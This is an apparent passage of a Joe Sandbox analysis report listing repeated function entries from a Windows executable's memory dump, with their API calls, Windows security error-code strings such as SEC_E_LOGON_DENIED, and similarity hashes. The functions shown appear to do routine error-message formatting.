_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_MUST_BE_KDC, xrefs: 00007FF7F1DAEDA1
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_MUST_BE_KDC
API String ID: 1435330505-421735889
Opcode ID: 9ae41c34381301365762b6a9648815fcdf839abd08a5db5f03464133a66dd26b
Instruction ID: a0538669141035124c2471b0c2dc6a0b6e8f915b1cbd6cfbaacc4a9be6ed5c62
Opcode Fuzzy Hash: 9ae41c34381301365762b6a9648815fcdf839abd08a5db5f03464133a66dd26b
Instruction Fuzzy Hash: A6118F26618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEDAD Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
SEC_E_NOT_OWNER, xrefs: 00007FF7F1DAEDAD
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_NOT_OWNER
API String ID: 1435330505-85178166
Opcode ID: 7d8399ce0817d309106f839ca88abca59d46daa6eab85881ad7cab29fdf35604
Instruction ID: f46831ab0227906e0dbf3d4582cf152a1e6f1a862ff735d6eec363113000efb6
Opcode Fuzzy Hash: 7d8399ce0817d309106f839ca88abca59d46daa6eab85881ad7cab29fdf35604
Instruction Fuzzy Hash: 26116D22618A4285E7A8FF10A0402EDA375FF88781FC14036D9AE027D6DFBCE845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAED7D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_MAX_REFERRALS_EXCEEDED, xrefs: 00007FF7F1DAED7D
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_MAX_REFERRALS_EXCEEDED
API String ID: 1435330505-2208301713
Opcode ID: 6b8486946659c8238f8ca053dcc9d18e3f13eeea38739b9ff9d4a0ceccabc4f4
Instruction ID: afe88f923208ac113ecc5b73f8d9d3cffd8f308a1600b4289da6d7d2ccf139cf
Opcode Fuzzy Hash: 6b8486946659c8238f8ca053dcc9d18e3f13eeea38739b9ff9d4a0ceccabc4f4
Instruction Fuzzy Hash: 8A118F26618A4285E7A8FF10A0442FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAED95 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_MULTIPLE_ACCOUNTS, xrefs: 00007FF7F1DAED95
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_MULTIPLE_ACCOUNTS
API String ID: 1435330505-531237286
Opcode ID: 88cc65a7bc263d0da757b9c16bc81612ee8c4f3d4b062dc1a3e0aba14bf6eee3
Instruction ID: cf095a041c68abe514af09a353424450530b0dfc0793636497cda718e5644259
Opcode Fuzzy Hash: 88cc65a7bc263d0da757b9c16bc81612ee8c4f3d4b062dc1a3e0aba14bf6eee3
Instruction Fuzzy Hash: 0F118F26618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAED89 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_MESSAGE_ALTERED, xrefs: 00007FF7F1DAED89
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_MESSAGE_ALTERED
API String ID: 1435330505-4174774321
Opcode ID: c2e9f8d4970fe8280d0de53a0b398aaf4d994befed7486f487b87f83eafbc6c9
Instruction ID: 2ccf0b924489bb422b22457a794641f7b1fa088baf2ae0b781614635b0f712b2
Opcode Fuzzy Hash: c2e9f8d4970fe8280d0de53a0b398aaf4d994befed7486f487b87f83eafbc6c9
Instruction Fuzzy Hash: 52118F26618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAED65 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_KDC_UNKNOWN_ETYPE, xrefs: 00007FF7F1DAED65
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_KDC_UNKNOWN_ETYPE
API String ID: 1435330505-2300855807
Opcode ID: dd1ac629be1cd07c5373d2a5811cd7d8860cd33eaa1cb76954666a5eefee97bc
Instruction ID: 3ebffb118a16708ffe9f0b471c55d473a305ce89e25501837c354c8defb09314
Opcode Fuzzy Hash: dd1ac629be1cd07c5373d2a5811cd7d8860cd33eaa1cb76954666a5eefee97bc
Instruction Fuzzy Hash: DD118F26618A4285E7A9FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAED59 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_KDC_UNABLE_TO_REFER, xrefs: 00007FF7F1DAED59
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_KDC_UNABLE_TO_REFER
API String ID: 1435330505-1677429073
Opcode ID: b23b7420c7e163b49ed81d033c24075b049a41e11dc10c77c8544a8578a14ffa
Instruction ID: 7a5468348f5fc6a5c0eca9cb25d4312e3cb49111c622cf9d2ccd6cf8e08fc470
Opcode Fuzzy Hash: b23b7420c7e163b49ed81d033c24075b049a41e11dc10c77c8544a8578a14ffa
Instruction Fuzzy Hash: 05118F26618A4285E7A8FF10A0442FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAED71 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
SEC_E_LOGON_DENIED, xrefs: 00007FF7F1DAED71
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_LOGON_DENIED
API String ID: 1435330505-3139097263
Opcode ID: 710a176b6175d03d4d1190c66f5ab75de5512d9aa6ab26a5f5e39b0f7f4f0251
Instruction ID: 1221c66b4bbdf03d5283876577c942cc1f9db1ae6c52d5425d81e2b8a25a3eba
Opcode Fuzzy Hash: 710a176b6175d03d4d1190c66f5ab75de5512d9aa6ab26a5f5e39b0f7f4f0251
Instruction Fuzzy Hash: 51118F22618A4286E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAED41 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_KDC_CERT_REVOKED, xrefs: 00007FF7F1DAED41
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_KDC_CERT_REVOKED
API String ID: 1435330505-392938328
Opcode ID: 31050e1a7bab2b163812165b7f916e594586f4ea9503c75469ba3fa8aa7768b5
Instruction ID: 1e164377d8895ec74e9dc3a2db5c72dc432df510cc2034708ab9e3027d3660b5
Opcode Fuzzy Hash: 31050e1a7bab2b163812165b7f916e594586f4ea9503c75469ba3fa8aa7768b5
Instruction Fuzzy Hash: 1D118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAED4D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C
SEC_E_KDC_INVALID_REQUEST, xrefs: 00007FF7F1DAED4D

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_KDC_INVALID_REQUEST
API String ID: 1435330505-4043682555
Opcode ID: 5b100ee6c80bd475dd4efe02c8c1e52e4cb1157a3b8d4765f2ae338aa4e90b31
Instruction ID: 2878e7235facc03d94e854a9fd2711ecc03eefed03a0225af7835fcb82a16579
Opcode Fuzzy Hash: 5b100ee6c80bd475dd4efe02c8c1e52e4cb1157a3b8d4765f2ae338aa4e90b31
Instruction Fuzzy Hash: 22118F26618A4285E7A8FF10A0502FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAED1D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C
SEC_E_ISSUING_CA_UNTRUSTED, xrefs: 00007FF7F1DAED1D

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_ISSUING_CA_UNTRUSTED
API String ID: 1435330505-2125857805
Opcode ID: b396ffa8aee3047b3b09d96b7eeafa63f21bf61c18f9e5c8be944110db82078d
Instruction ID: 18251ae4882eeb17dd253d3fe0f1358c719dee86b8dedf6918ce728565fccd39
Opcode Fuzzy Hash: b396ffa8aee3047b3b09d96b7eeafa63f21bf61c18f9e5c8be944110db82078d
Instruction Fuzzy Hash: EF118F22618A4285E7A8FF10A0402FDA375FF88781FC54036D9AE427D6DFBCD845C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAED35 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_KDC_CERT_EXPIRED, xrefs: 00007FF7F1DAED35
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
